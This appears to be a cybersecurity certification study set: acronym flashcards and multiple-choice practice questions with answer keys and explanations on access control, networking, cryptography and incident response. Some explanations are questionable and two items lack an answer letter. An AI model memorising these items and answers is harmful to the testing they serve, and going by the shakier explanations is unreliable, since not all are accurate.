CyberSecurity 601
FISMA
Federal Information Security Management Act
IMAP
Internet Message Access Protocol
RBAC
Role Based Access Control
STIX
Structured Threat Information eXpression
VoIP
Voice over Internet Protocol - a phone connection through a personal computer with any type of broadband Internet connection.
MAC
Mandatory Access Control
MTA
Message Transfer Agent
ECB
Electronic Code Book
ICV
Integrity Check Value
ISA
Interconnection Security Agreement
L2TP
Layer 2 Tunneling Protocol
MTD
Maximum Tolerable Downtime
MEF
Mission Essential Functions
DAC
Discretionary Access Control
Port 143
IMAP (Internet Message Access Protocol)
OAuth
Open Authorization
COBIT
Control Objectives for Information and Related Technology
Port 110
POP3 (Post Office Protocol)
SABSA
Sherwood Applied Business Security Architecture
TAP
Test Access Point
ARO
Annualized Rate of Occurrence
API
Application Programming Interface
AH
Authentication Header
CI
Continuous Integration
CTI
Cyber Threat Intelligence
COPE
Corporate Owned, Personally Enabled
CRL
Certificate Revocation List
TOR
The Onion Router
TOTP
Time-based One-Time Password
TCP/IP
Transmission Control Protocol/Internet Protocol
TLS
Transport Layer Security
MitB
Man-in-the-Browser
SFTP
Secure File Transfer Protocol
COBO
Corporate Owned, Business Only
Which malicious code indicator is a minimal program designed to exploit a buffer overflow? A. Credential dumping B. Persistence C. Lateral movement/insider attack D. Shellcode
D Shellcode is a minimal program designed to exploit a buffer overflow or similar vulnerability to gain privileges, or to drop a backdoor on the host if run as a Trojan. Credential dumping is when malware might try to access the credentials file (SAM on a local Windows workstation) or sniff credentials held in memory by the lsass.exe system process. Lateral movement/insider attack is the general procedure that uses the foothold to execute a process remotely, using a tool such as psexec. Persistence is a mechanism that allows the threat actor's backdoor to restart if the host reboots or the user logs off.
AUP
Acceptable Use Policy
SOAP
Simple Object Access Protocol
XSRF
Cross-Site Request Forgery
CER
Cross-over Error Rate
DH
Diffie-Hellman
NTP
Network Time Protocol
Port 25
SMTP (Simple Mail Transfer Protocol)
SLA
Service Level Agreement
SMTP
Simple Mail Transfer Protocol
WRT
Work Recovery Time
AD
Active Directory
AES
Advanced Encryption Standard
ALE
Annualized Loss Expectancy
ABAC
Attribute-based Access Control
AS
Authentication Service
AIS
Automated Indicator Sharing
BYOD
Bring Your Own Device
CBC
Cipher Block Chaining
NDA
Non-Disclosure Agreement
RPO
Recovery Point Objective
RTO
Recovery Time Objective
ROSI
Return on Security Investment
The IT department head returns from an industry conference feeling inspired by a presentation on the topic of cybersecurity frameworks. A meeting is scheduled with IT staff to brainstorm ideas for deploying security controls by category and function throughout the organization. Which of the following ideas are consistent with industry definitions? (Select all that apply.) A. Deploy a technical control to enforce network access policies. B. Deploy an operational control to monitor compliance with external regulations. C. Schedule quarterly security awareness workshops as a preventive control to mitigate social engineering attacks. D. Deploy agents to file servers to perform continuous backups to cloud storage as a corrective control to mitigate the impact of malware.
A, C, and D A technical control is enforced by computer hardware and software, such as an access control list (ACL) configured on a network firewall. Monitoring of risk and compliance is a type of managerial control, not an operational control. Operational controls are categorized as those performed by people, such as security guards. A preventive control such as user education and training is one that eliminates or reduces the likelihood of an attack before it can take place. A corrective control such as backup is used following an attack to eliminate or mitigate its impact.
An engineer needs to review systems metadata to conclude what may have occurred during a breach. The first step the engineer takes in the investigation is to review MTA information in an Internet header. Which data type does the engineer review? A. Web B. Email C. File D. Cell
B An email's Internet header contains address information for the recipient and sender, plus details of the servers or Message Transfer Agents (MTAs) handling transmission of the message between them. When a client requests a resource from a web server, the server returns the resource plus headers setting or describing its properties. File metadata is stored as attributes. The file system tracks when a user creates, accesses, and modifies a file. The user might assign a file a security attribute, such as marking it as read-only or as a hidden or system file. Mobile phone metadata comprises call detail records (CDRs) of incoming, outgoing, and attempted calls and other data, such as SMS text times.
Artificial intelligence (AI) and machine learning are especially important during which security information and event management (SIEM) task? A. Packet capture B. Analysis and report review C. Data aggregation D. Log collection
B Data captured from network sensors/sniffers plus NetFlow sources provides both summary statistics about bandwidth and protocol usage and the opportunity for detailed frame analysis. SIEM software can link individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IOC). Many SIEM solutions use artificial intelligence (AI) and machine learning as the basis for automated analysis. As distinct from collection, aggregation refers to normalizing data from different sources so that it is consistent and searchable. The first task for SIEM is to collect data inputs from multiple sources, including agent-based log collection, sensor or sniffer data, and listener/collector protocols, such as syslog and Simple Network Management Protocol (SNMP).
During a training event, an executive at a large company asks the security manager trainer why pushing automatic updates as a patch management solution is not ideal for their Enterprise network. How will the security manager most likely respond? A. The security manager pushes updates individually, based on office hours. B. Automatic updates can cause performance and availability issues. C. A patch management suite is impractical for Enterprise networks. D. Next-generation endpoint protection suites perform patch management.
B Enterprise networks need to be cautious about automated deployment, as a patch that is incompatible with an application or workflow can cause availability issues. If multiple applications run update clients on the same host, performance issues may also arise. Scheduling conflicts may influence patch management decisions, but in an enterprise network, a patch management suite, rather than an individual, will handle updates. Endpoint detection and response (EDR) products analyze system data and logs to provide early threat detection. Patch management suites identify, test, and deploy operating system (OS) and application updates. Patches are often classified as critical, security-critical, recommended, and optional.
A network manager needs a map of the network's topology. The network manager is using Network Mapper (Nmap) and will obtain the visual map with the Zenmap tool. If the target IP address is 192.168.1.1, determine the command within Nmap that will return the necessary data to build the visual map of the network topology. A. nmap -sn --ipconfig 192.168.1.1 B. nmap -sn --ifconfig 192.168.1.1 C. nmap -sn --traceroute 192.168.1.1 D. nmap -sn --nslookup 192.168.1.1
C The traceroute command is used to probe a path from one end system to another, and lists the intermediate systems providing the link. Nmap combined with the Zenmap tool will give a visual of the network topology. The ipconfig and ifconfig commands are used for looking at the configuration of a system's network adapter. The primary difference between the ipconfig and ifconfig commands is the type of system they run on: ipconfig is designed for Windows, while ifconfig is designed for use on Linux systems. The nslookup command is used to query the Domain Name System (DNS).
A security analyst needs to contain a compromised system. The analyst would be most successful using which containment approach? A. Black hole B. VLAN C. ACL D. Air gap
D A simple option is to disconnect the host from the network completely (creating an air gap) or to disable its switch port. This is the least stealthy option and may reduce opportunities to analyze the attack or malware due to the isolation. The analyst can implement a routing infrastructure to isolate one or more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest of the network. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture such as VLANs. ACLs can prevent a host or group of hosts from communicating outside of a protected segment.
Which method might an attacker use to redirect login via information gained by implementing JavaScript on a webpage the user believes is legitimate? A. Man-in-the-Browser (MitB) B. Confused deputy C. Reflected D. Clickjacking
D Clickjacking is an attack characterized as a difference between what a user sees and trusts as a web application with a login page or form, and the reality of the page or form containing a malicious layer or invisible iframe, allowing an attacker to intercept or redirect user input. Man-in-the-Browser (MitB) attacks occur when the web browser is compromised by installing malicious plugins or scripts or intercepting API calls between the browser process and a Dynamic Link Library (DLL). If a target site assumes the browser is authenticated because there is a valid session cookie and does not complete any additional authorization process, a confused deputy attack has occurred. A reflected attack exploits vulnerabilities in the server-side script and is one of the most powerful input validation exploits. It involves a trusted site, a client browsing the trusted site, and the attacker's site.
Evaluate the following choices based on their potential to lead to a network breach. Select the choice that is NOT a network architecture weakness. A. The network architecture is flat. B. Services rely on the availability of several different systems. C. The network relies on a single hardware server. D. Not all hosts on the network can talk to one another.
D It is good that not all the hosts can talk to each other. If any host can contact another host, an attacker can penetrate the network edge and gain freedom of movement. A flat architecture is where all hosts can contact each other, exposing an overdependence on perimeter security. When services rely on several different systems, the failure of one will affect the overall performance of other network services. Relying on a single hardware server represents a single point of failure, meaning the whole network crashes if the server goes down.
Which scripting language is the preferred method of performing Windows administration tasks? A. JavaScript B. Python C. Ruby D. PowerShell
D PowerShell is the preferred method of performing Windows administration tasks. JavaScript is the programming language of the web and is one of the most popular programming languages. Python is a popular language for implementing all kinds of development projects, including automation tools and security tools, as well as malicious scripts. Ruby is a dynamic, open source programming language with a focus on simplicity and productivity. It has an elegant syntax that is natural to read and easy to write.
A systems engineer configures a disk volume with a Redundant Array of Independent Disks (RAID) solution. Which solution does the engineer utilize when allowing for the failure of two disks? A. Level 1 B. Level 0 C. Level 5 D. Level 6
D Redundant Array of Independent Disks (RAID) Level 6 has double parity, or Level 5 with an additional parity stripe. This allows the volume to continue when two disks have been lost. Level 1 uses mirroring, where data is written to two disks simultaneously, which provides redundancy. The main drawback is that its storage efficiency is only 50%. RAID Level 0 is striping without parity, resulting in no fault tolerance. Data is written in blocks across several disks. RAID Level 5 has striping with parity. Data is written across three or more disks, but additional parity information is calculated. This allows the volume to continue if one disk is lost. This solution has better storage efficiency than RAID 1.
A system administrator uses a Graphical User Interface (GUI) remote administration tool over TCP port 3389 to manage a server operating Windows 2016. Evaluate the types of remote administration tools to conclude which protocol the administrator is using. A. Secure Shell B. Telnet C. Dynamic Host Configuration Protocol D. Remote Desktop
D Remote Desktop Protocol (RDP) is Microsoft's protocol for operating remote connections to a Windows machine. RDP uses TCP port 3389. Secure Shell (SSH) is the principal means of obtaining secure remote access to a UNIX or Linux server. Telnet is terminal emulation software to support a remote connection to another computer and uses TCP port 23 by default. Telnet is not secure but can be used over a secure channel, such as an IPSec tunnel. The Dynamic Host Configuration Protocol (DHCP) provides an automatic method for network address allocation.
Data exists in several states, each requiring different security considerations. Evaluate the following items and select which data state presents the greatest risk due to decryption. A. Data in use B. Data in transit C. Data in motion D. Data at rest
A Data in use is when data is present in volatile memory. When a user works with data, that data needs to be decrypted, which puts it at risk. Transmitting data over a network refers to data in transit. The encryption challenge is not as great as with data in use. Data in motion is another name for data in transit. When data is at rest, it is usually possible to encrypt the data using a variety of techniques, such as whole disk encryption, database encryption, and file- or folder-level encryption.
An individual contacts a company's IT department, threatening to exploit a vulnerability found in the company's security infrastructure if the company does not pay a bounty. Upon further investigation, the IT team discovers that the individual threatening the company used crude scripts in the hacking attempt, which they easily managed. Which statement best describes the disparity between the hacker's claim and the hacker's real capability? A. The hacker presents as a black hat, but the individual's capabilities indicate the hacker is a script kiddie. B. The hacker claims to be a white hat, but the threatening demeanor and capabilities represent those of a black hat hacker. C. The hacker presents as a script kiddie, but the threatening demeanor and capabilities indicate a black hat hacker. D. The hacker presents as a gray hat hacker, but the individual's capabilities indicate a script kiddie.
A The term hacker describes an individual who has the skills to gain access to computer systems through unauthorized or unapproved means. A black hat hacker acts with malicious intent. A script kiddie is someone who uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. A white hat hacker has technical skill and creativity, but non-malicious intent. Technical skill and creativity distinguish a hacker from a script kiddie. A hacker excels at computer programming and computer system administration, while a script kiddie uses hacker tools without the ability to craft new attack methods. Gray hat hackers will not generally extort a target but may offer services after revealing a vulnerability.
ACL
Access Control List
A systems breach occurs at a manufacturer. The system in question contains highly valuable data. An engineer plans a live acquisition, but ultimately, is not successful. What reason may be stopping the engineer? A. There is no hibernation file present B. The tools are not preinstalled or running C. The crash dump file is missing D. The pagefile is corrupt
B A specialist hardware or software tool can capture the contents of memory while the host is running (live acquisition). This type of tool needs to be pre-installed or a standalone executable needs to be run, as it requires a kernel mode driver to dump any data of interest. When a Windows host is in a sleep state, the system creates a hibernation file on disk in the root folder of the boot volume. This file is not a prerequisite for a live acquisition. When Windows encounters an unrecoverable kernel error, it can write contents of memory to a dump file. This file is not a prerequisite for a live acquisition. The pagefile/swap file/swap partition stores pages of memory in use that exceed the capacity of the host's RAM modules. This file is not a prerequisite for a live acquisition.
The _____ requires federal agencies to develop security policies for computer systems that process confidential information. A. Sarbanes-Oxley Act (SOX) B. Computer Security Act C. Federal information Security Management Act (FISMA) D. Gramm-Leach-Bliley Act (GLBA)
B The Computer Security Act (1987) specifically requires federal agencies to develop security policies for computer systems that process confidential information. The Sarbanes-Oxley Act (2002) mandates the implementation of risk assessments, internal controls and audit procedures. This act is not for any specific entity. The Federal Information Security Management Act (2002) governs the security of data processed by federal government agencies. This act requires agencies to implement an information security program. The Gramm-Leach-Bliley Act (1999) is a United States federal law that requires financial institutions to explain how they share and protect their customers' private information.
A security team uses passive scanning to gather information and data related to a suspected rogue system on a network. By using passive scanning, what type of information does the team gather? A. Credentialed B. Indirect evidence C. Embedded D. Report
B Non-intrusive (or passive) scanning means analyzing indirect evidence, such as the types of traffic generated by a device. A credentialed scan (whether passive or active) is given a user account with logon rights to various hosts, plus whatever other permissions are appropriate. These credentials allow access to protected information. Embedded refers to a system type, such as VoIP phones, where the OS is built into the system. These system types are prone to crashing when scanned. Report data is available from many scanning systems, which use databases of known software and configuration vulnerabilities. Reports may include information about each vulnerability in the database.
CA
Certificate Authority
CTM
Counter-Mode
CSF
Cybersecurity Framework
Identify the command that can be used to detect the presence of a host on a particular IP address. A. ipconfig B. ifconfig C. ip D. ping
D The ping command can be used to detect the presence of a host on a particular IP address or that responds to a particular host name. This command is a fast and easy way to determine if a system can communicate over the network with another system. The ipconfig command is used to report the configuration assigned to the network adapter in Windows. The ifconfig command can be used to report the adapter configuration in Linux. The ip command is a more powerful command in Linux and gives options for managing routes as well as the local interface configuration.
DNSSEC
Domain Name System Security Extensions
DLL
Dynamic Link Library
EKU
Extended Key Usage
FAR
False Acceptance Rate
FDE
Full Disk Encryption
LDAP
Lightweight Directory Access Protocol
Nmap
Network Mapper
OTP
One-time password
TCP Port 3389
RDP (Remote Desktop Protocol)
SOX
Sarbanes-Oxley Act
S/MIME
Secure/Multipurpose Internet Mail Extensions
SAML
Security Assertions Markup Language
SIEM
Security Information and Event Management
SDN
Software Defined Networking
SDLC
Software Development Life Cycle
SAN
Storage Area Network
TKIP
Temporal Key Integrity Protocol
TACACS+
Terminal Access Controller Access Control System Plus
A cloud server has been breached. The organization realizes that data acquisition differs in the cloud when compared to on-premises. What roadblocks may the organization have to consider when considering data? (Select all that apply.) A. On-demand services B. Jurisdiction C. Chain of custody D. Notification laws
The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Jurisdiction and data sovereignty may restrict what evidence the CSP is willing to release to the organization. Chain of custody issues are complex, as the organization may have to rely on the CSP to select and package data for it. If the CSP is a data processor, it will be bound by data breach notification laws and regulations. This issue does not relate to the acquisition of data.
Key Life Cycle
The stages are: key generation, certificate generation, storage, revocation, and expiration and renewal.
VPC
Virtual Private Cloud
WS
Web Services
WPA
WiFi Protected Access
A systems manager creates a control diversity plan to enact a defense in depth approach to security. To mitigate any possible risk of a virus infection, the plan includes which physical and administrative controls? (Select all that apply.) A. User training B. USB port locks C. Restricted permissions D. Endpoint security
A and B User training (an administrative control) may ensure that a USB drive is not inserted into a computer system without scanning it first. Security locks inserted into USB ports (a physical control) on a system could prevent malicious activity by denying the attachment of media without first requesting a key. Permissions restricting a user account (a technical control) could prevent any malware from executing successfully. This includes actions such as installing software. Endpoint security software (a technical control) on a system could scan for malware or block access automatically. Endpoint security can monitor a system at all times.
Xander sends a malicious file via email attachment to employees at a target company, hoping at least one employee will open the malicious file that will propagate through the company's network and disrupt the company's operations. If Xander's goal is disruption of company operations, what does this describe? A. intent B. motivation C. risk D. threat
A Intent describes what an attacker hopes to achieve from the attack, while motivation is the attacker's reason for perpetrating the attack. A malicious threat actor's motivation could be greed, curiosity, or some sort of grievance. The intent could be to vandalize and disrupt a system or to steal something. Risk is the likelihood and impact of a threat actor exploiting a vulnerability. To assess risk, one must identify a vulnerability and then evaluate the likelihood of a threat exploiting it and the impact that a successful exploit would have. A threat is the potential for someone or something to exploit a vulnerability and breach security.
An engineer configures a proxy to control access to online content for all users in an organization. Which proxy type does the engineer implement by using an inline network appliance? (Select all that apply.) A. Non-transparent B. Transparent C. Intercepting D. Application
B and C A transparent proxy must be implemented on a switch, router, or other inline network appliance. An intercepting proxy (known as a transparent proxy) is configured to intercept client traffic without the client having to be reconfigured. A non-transparent proxy configuration means that the client must be configured with the proxy server address and port number to use it. Proxy servers can be application-specific; others are multipurpose. A multipurpose proxy is one configured with filters for multiple protocol types. In this case, the target is not a specific application.
Identify the true statements about supervisory control and data acquisition (SCADA) systems. (Select all that apply.) A. SCADA systems typically communicate with one another through LAN connections. B. SCADA systems typically run as software on ordinary computers, gathering data from and managing field devices. C. SCADA systems are purpose-built devices that prioritize IT security features. D. SCADA systems serve primarily industrial, manufacturing, utility, and logistics sectors.
B and D SCADA typically runs as software on ordinary computers, gathering data from and managing plant devices and equipment with embedded PLCs, referred to as field devices. Many sectors of industry, including utilities, industrial processing, fabrication and manufacturing, logistics, and facilities management, use these types of systems. SCADA systems typically use WAN communications, such as cellular or satellite, to link the SCADA server to field devices. ICS/SCADA was historically built without regard to IT security, though there is now high awareness of the necessity of enforcing security controls to protect them, especially when they operate in a networked environment.
A security manager configures an access control list (ACL) to enumerate permissions to data resources. Evaluate the control measure and determine to what state of data the control applies. A. Data in transit B. Data in processing C. Data in encryption D. Data at rest
D ACLs ensure only authorized users can read or modify data. ACLs can be applied only if access to the data is fully mediated through a trusted OS. Data in transit or data in motion describes data while it is transmitting over a network, such as a website or remote access traffic. Transport encryption protocols, such as TLS or IPSec protect data in transit. Data in use or data in processing is present in volatile memory, such as system RAM or CPU registers and cache. Data in use may stay decrypted for an entire work session, which puts it at risk. Trusted execution environment (TEE) mechanisms encrypt data as it exists in memory, so that an untrusted process cannot decode the information.
EF
Exposure Factor
Which microwave connection mode is most appropriate for forming a strong connection between two sites? A. P2P B. P2M C. OTA D. OTG
A A point-to-point topology occurs when two nodes have a dedicated connection to one another. In a point-to-multipoint topology, a central node mediates links between remote nodes. Point-to-multipoint (P2M) microwave uses smaller sectoral antennas, each covering a separate quadrant. Where P2P is between two sites, P2M links multiple sites or subscriber nodes to a single hub. Over-the-air (OTA) firmware updates are delivered to radio devices via a cellular data connection. The USB on the go (OTG) specification allows a mobile device to act as a host when a device, such as an external drive or keyboard, is attached. USB OTG allows a port to function either as a host or as a device.
A networking administrator is reviewing available security products to further fine-tune the existing firewall and appliance settings. An administrator should analyze which system logs in order to tune firewall rulesets and remove or block suspect hosts and processes from the network? A. Network-based intrusion detection system (NIDS) B. Unified threat management (UTM) product C. Network-based intrusion prevention system (IPS) D. Network behavior and anomaly detection (NBAD) product
A Analyzing NIDS logs allows an administrator to tune firewall rulesets, remove or block suspect hosts and processes from the network, or deploy additional security controls to mitigate any identified threats. A unified threat management (UTM) product centralizes many types of security controls into a single appliance. A UTM might not perform as well as software or a device with a single dedicated security function. Compared to the passive function of an IDS, an intrusion prevention system (IPS) can provide an active response to any network threats that it matches. An NBAD engine uses heuristics to generate a statistical model of baseline normal traffic. The system generates false positives and false negatives until it improves its statistical model of what is "normal."
Which of the following statements differentiates between input validation and output encoding? A. Input validation ensures that data input into an application is in a compatible format for the application, while output encoding re-encodes data that transfers between scripts. B. Input validation is a server-side validation method, while output encoding is a client-side validation method. C. Output encoding is a server-side validation method, while input validation encoding is a client-side validation method. D. Input validation forces the browser to connect using HTTPS only, while output encoding sets whether the browser can cache responses.
A Input validation ensures that an application can appropriately handle the data entered into a field or variable in the application. Output encoding occurs when a script passes data to another script. Output encoding ensures it is not passing any malicious "script" contents. Input validation occurs when a script takes data passed to it by some other process. Client-side code, server-side code, or both, can perform input validation. Output encoding avoids the assumption that input will have been sanitized already. HTTP Strict Transport Security (HSTS) forces a browser to connect using HTTPS only, mitigating downgrade attacks, such as SSL stripping. Cache-control sets whether the browser can cache responses.
Where should an administrator place an internet-facing host on the network? A. DMZ B. Bastion host C. Extranet D. Private network
A Internet-facing hosts reside in one or more Demilitarized Zones (DMZs), or perimeter networks. Traffic cannot pass through a DMZ, but it enables external clients to access data on private systems, such as web servers, without compromising the security of the entire internal network. Bastion hosts reside in a DMZ and are not fully trusted by the internal network due to the possibility of Internet compromise. An extranet is a network of semi-trusted hosts, typically representing business partners, suppliers, or customers. Hosts must authenticate to join the extranet. A private network or intranet is a network of trusted hosts owned and controlled by the organization. It should never be Internet-facing.
When using a digital envelope to exchange key information, the use of what key agreement mitigates the risk inherent in the Rivest-Shamir-Adleman (RSA) algorithm, and by what means? A. Perfect forward secrecy (PFS) uses Diffie-Hellman (DH) key agreement to create ephemeral session keys without using the server's private key. B. The Cipher Block Chaining (CBC) key agreement mode uses an initialization vector (IV) to create ephemeral session keys without using the server's private key. C. Counter mode in key agreement makes the advanced encryption standard (AES) algorithm work as a stream cipher, by applying an initialization vector to issue a security certificate. D. A certificate authority (CA) validates the public key's owner and creates an initialization vector to protect the exchange from snooping.
A Perfect forward secrecy (PFS) mitigates the risk from RSA key exchange, using Diffie-Hellman (D-H) key agreement to create ephemeral session keys without using the server's private key. Modes of operation refer to AES use in a cipher suite. Cipher Block Chaining (CBC) mode applies an initialization vector (IV) to a chain of plaintext data and uses padding to fill out blocks of data. Counter mode makes the AES algorithm work as a stream cipher. Each block of data can be processed individually and in parallel, improving performance. A certificate authority (CA) validates the owner of a public key, issuing a signed certificate. The process of issuing and verifying certificates is called public key infrastructure (PKI).
Arrange the following stages of the incident response life cycle in the correct order. A. Preparation; Identification; Containment, Eradication, and Recovery; Lessons Learned B. Identification; Preparation; Containment, Eradication, and Recovery; Lessons Learned C. Containment, Eradication, and Recovery; Identification; Preparation; Lessons Learned D. Identification; Containment, Eradication, and Recovery; Preparation; Lessons Learned
A Stage 1. Preparation requires making the system resilient to attack in the first place (hardening systems, writing policies and procedures, and establishing confidential lines of communication). Stage 2. Identification involves determining whether an incident has taken place and assessing how severe it might be, followed by notification of the incident to stakeholders. Stage 3. Containment, Eradication, and Recovery are limiting the scope and impact of the incident. Once the incident is contained, the cause can then be removed and the system brought back to a secure state. Stage 4. Lessons learned consists of analyzing the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident.
When a network uses Extensible Authentication Protocol (EAP) as the authentication method, what access control standard restricts local traffic to authentication data when a client connects over a Virtual Private Network (VPN) gateway? A. IEEE 802.1X B. Kerberos C. Terminal Access Controller Access-Control System Plus (TACACS+) D. Remote Authentication Dial-in User Service (RADIUS)
A The IEEE 802.1X Port-based Network Access Control (NAC) standard provides the means of using an EAP method when a device connects to a VPN gateway. With 802.1X, the network access server (NAS) device accepting remote connections does not have to store any authentication credentials. The network access server forwards only EAP authentication data between the authentication server (implemented by TACACS+ or RADIUS) and the supplicant requesting remote access. Full network access is only granted once the supplicant has been authenticated. Kerberos is designed to work over a trusted local network. Different authentication protocols have been developed to work with remote access protocols, where the connection is made over a serial link or virtual private network (VPN). TACACS+ can implement the authentication server role, but does not provision the full set of supplicant, authenticator and authentication server roles required for a VPN topology. Also, TACACS+ is more commonly used to authenticate administrative access to network appliances than to authenticate remote access VPNs. RADIUS can implement the authentication server role, but does not provision the full set of supplicant, authenticator and authentication server roles required for a VPN topology.
A technician is configuring Internet Protocol Security (IPSec) for communications over a Virtual Private Network (VPN). Evaluate the features of available modes and recommend the best option for implementation. A. Tunnel mode because the whole IP packet is encrypted, and a new IP header is added. B. Transport mode because the whole IP packet is encrypted, and a new IP header is added. C. Tunnel mode because the payload is encrypted. D. Transport mode because the payload is encrypted.
A The technician should use tunnel mode because the whole IP packet, including header and payload, is encrypted and a new IP header added. This mode is used for communications across an unsecure network (creating a VPN). In transport mode, the IP header for each packet is not encrypted, just the data (payload). This mode is used for secure communications on a private network (an end-to-end implementation). In tunnel mode, the header and the payload are encrypted. In transport mode, the payload is encrypted but this does not provide sufficient security for a VPN.
A network administrator conducts a network assessment to determine where to implement a network intrusion detection system (NIDS). Which sensor deployment option is most ideal if the admin is concerned about system overloads and resiliency in the event of power loss? A. Passive test access point (TAP) B. Active test access point (TAP) C. Aggregation test access point (TAP) D. Switched port analyzer (SPAN)/mirror port
A With a passive TAP, the monitor port receives every frame—corrupt, malformed, or not—and load does not affect copying. Because it performs an active function, an active TAP becomes a point of failure for the links in the event of power loss. When deploying an active TAP, it is important to use a model with backup power options. Aggregation TAPs rebuild the upstream and downstream channels into a single channel, but these can drop frames under very heavy load. SPAN/mirror port sensor is not completely reliable, as frames with errors will not be mirrored and frames may be dropped under heavy load.
Compare the features of static and dynamic computing environments and then select the accurate statements. (Select all that apply.) A. Embedded systems are typically static computing environments, while most personal computers are dynamic computing environments. B. Dynamic computing environments are easier to update than static computing environments. C. Dynamic computing environments give less control to users than static computing environments. D. Dynamic computing environments are easier to secure than static computing environments.
A and B An embedded computing environment is a complete computer system that is designed to perform a specific, dedicated function. A PC is a dynamic computing environment where the user can add or remove programs and data files. A dynamic computing environment provides users more control to perform actions like install or update applications. A static computing environment update will usually only be available through specific management interfaces. A static computing environment gives less control than a dynamic computing environment. Each embedded system may differ in how each one is handled or maintained, and therefore may require more manual tasks than dynamic systems. A static computing environment is easier to protect. This is due to the unchanging environment without adding new hardware or software. With fewer changes and additions, the systems are not introduced to as many threats.
A systems engineer decides that security mechanisms should differ for various systems in the organization. In some cases, systems will have multiple mechanisms from multiple sources. Which types of diversity does the engineer practice? (Select all that apply.) A. Control B. Vendor C. Change D. Resiliency
A and B Control diversity means that the layers of controls should combine different classes of technical and administrative controls with the range of control functions. Vendor diversity means that security controls are sourced from multiple sources. A vulnerability in solutions from a single vendor approach is a security weakness. Change refers to control processes or management. Control involves careful planning, with consideration for how the change will affect dependent components. Enterprise-level networks often provision resiliency at the site level. An alternate processing or recovery site is a location that can provide the same (or similar) level of service. Resiliency itself does not provide diversity.
Select the explanations that accurately describe the Ticket Granting Ticket (TGT) role within the Authentication Service (AS). (Select all that apply.) A. The client sends the AS a request for a TGT that is composed by encrypting the date and time on the local computer with the user's password hash as the key. B. The AS responds with a User Ticket that contains information about the client. This includes the name and IP address of the client, plus a timestamp and validity period. C. The AS responds with a TGT key for use in communications between the client and the Ticket Granting Service (TGS). D. The TGT responds with a service session key for use between the client and the application server.
A and B The Authentication Service (AS) is responsible for authenticating user logon requests. The first step within AS is when the client sends the AS a request for a Ticket Granting Ticket (TGT). This is composed by encrypting the date and time on the local computer with the user's password hash as a key. A User Ticket contains information about the client and includes a timestamp and validity period. The information is encrypted using the KDC's secret key. This occurs after the user is found in the database and the request is valid. The AS does not respond back with a TGT key but with a Ticket Granting Service (TGS) key that is used in communications between the client and the TGS. The TGS is the service that responds with a service session key for use between the client and the application server.
Examine the differences between general purpose personal computer hosts and embedded systems and select the true statements regarding embedded system constraints. (Select all that apply.) A. Many embedded systems work on battery power, so they cannot require significant processing overhead. B. Many embedded systems rely on a root of trust established at the hardware level by a trusted platform module (TPM). C. Embedded systems often use the system on chip (SoC) design to save space and increase power efficiency. D. Most embedded systems are based on a common but customizable design, such as FPGA.
A and C Many embedded devices are battery-powered and may need to run for years without having to replace the cells. Processing must be kept to the minimum possible level. Embedded systems often use system on chip (SoC), a design where processors, controllers, and devices reside on a single processor die (or chip). This packaging saves space and is usually power efficient. A TPM establishes a root of trust at the hardware level on a PC, but most embedded systems do not have embedded TPMs, so they must rely on implicit trust and network perimeter security. A field programmable gate array (FPGA) is a type of controller that allows the end customer to configure the programming logic of the device to run a specific application.
A system administrator is deploying a new web server. Which hardening procedures should the administrator consider? (Select all that apply.) A. The administrator should use SFTP to transfer files to and from the server remotely. B. Any guest web access that exists on the web server should be disabled or removed. C. The administrator should assign a digital certificate and enable the use of TLS 1.3. D. The configuration templates contain vulnerabilities, and the administrator should not utilize them.
A and C Secure file transfer protocol (SFTP) safely transfers files remotely via SSH. Transport layer security (TLS) enables secure communication between the client and the web server. This is implemented by assigning a certificate to the web server. TLS 1.3 prevents downgrade attacks. Most web servers must allow for secure access to guest web access. Guest web access should only be allowed to view content in the website and not from any other web server directory. Web servers should deploy using configuration templates where possible.
An organization suspects that a visitor is performing data exfiltration while on the premises. The organization knows that the visitor does not have physical access to any computer system. Which of the following methods does the organization suspect the visitor of using? (Select all that apply.) A. Phone B. USB C. Remote access D. Camera
A and D Data exfiltration can happen by communicating information orally over a telephone, cell phone, or Voice over IP (VoIP) network. Cell phone text messaging is another possibility. Copying the data to removable media or other devices with storage, such as a USB drive, the memory card in a digital camera, or a smartphone, is not possible as the visitor has no access to computer systems. Using a network protocol, such as HTTP, FTP, SSH, email, or remote access is useful for data exfiltration. Remote access is not possible as the visitor has no access to computer systems. A camera can capture images or video of data. This data may be computer data. Since the visitor has no access to computer systems, other targets may be paper documents, post-it notes on desks, building layouts, and more.
An engineer creates a set of tasks that queries information and runs some PowerShell commands to automate several stages of the process, including the identification of threats and other malicious activity on multiple servers. The engineer defines these tasks using which of the following? A. Runbook B. Playbook C. Orchestration D. Automation
A runbook aims to automate as many stages of the playbook as possible, while leaving clearly defined interaction points for human analysis. A playbook is a type of list usually referred to as an incident response workflow. A playbook is a checklist of actions to perform, to detect and respond to a specific type of incident. Orchestration is the action of coordinating multiple automations (and possibly manual activity) to perform a complex, multistep task. Automation, unlike orchestration, is the action of scripting a single activity.
Consider the role trust plays in federated identity management and determine which models rely on networks to establish trust relationships. (Select all that apply.) A. SAML B. OAuth C. OpenID D. LDAP
A, B, and C Security Assertion Markup Language (SAML) is an identity federation format used to exchange authentication information between the principal, the service provider, and the identity provider. Authentication and authorization for a RESTful API is often implemented using the Open Authorization (OAuth) protocol. OpenID is an identity federation method enabling user authentication on cooperating websites by a third-party authentication service. Lightweight Directory Access Protocol (LDAP) is not an identity federation method. It is a network protocol used to access network directory databases storing information about authorized users and their privileges, as well as other organizational information.
A system administrator is configuring a new Dynamic Host Configuration Protocol (DHCP) server. Consider the various types of attacks specific to DHCP and determine which steps the system administrator should take to protect the server. (Select all that apply.) A. Use scanning and intrusion detection to pick up suspicious activity. B. Disable DHCP snooping on switch access ports to block unauthorized servers. C. Enable logging and review the logs for suspicious events. D. Disable unused ports and perform regular physical inspections to look for unauthorized devices.
A, C, and D The system administrator should use scanning and intrusion detection to pick up suspicious activity. The system administrator should set logging to be enabled and then review the logs regularly for suspicious events. The system administrator should disable unused ports and perform regular physical inspections to ensure that unauthorized devices are not connected via unused jacks. The system administrator should enable DHCP snooping on switch access ports to prevent the use of unauthorized DHCP servers. DHCP snooping acts as a firewall between the server and untrusted hosts and should be enabled versus disabled.
